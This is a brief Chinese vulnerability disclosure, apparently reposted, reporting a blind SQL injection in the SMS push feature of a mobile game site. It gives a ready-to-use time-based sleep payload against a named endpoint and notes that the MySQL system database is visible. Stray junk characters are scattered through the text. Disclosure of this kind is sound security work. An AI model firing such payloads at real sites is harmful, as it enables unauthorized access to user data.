简要描述:& @% t- O" V, ]( L3 ~# I! M
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。
* L7 U4 @) y2 r! r1 l1 d# Z; q
: `# t- A- W0 s4 ?% l" d# e详细说明:/ W8 w" [# E9 \3 J
存在SQL盲注url:) V; H- C/ U5 a$ o# w; S
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1( g0 W1 R7 `- u! O
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png% m; i" k- ^& S$ ?/ d% b* w& Z
http://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
( E" }1 Y: [) w; M& Ihttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
: c; ?8 Y; J. g0 g: N0 d2 G; Y/ h \8 ^
能看到mysql系统数据库,看来user权限应该很高的。。 |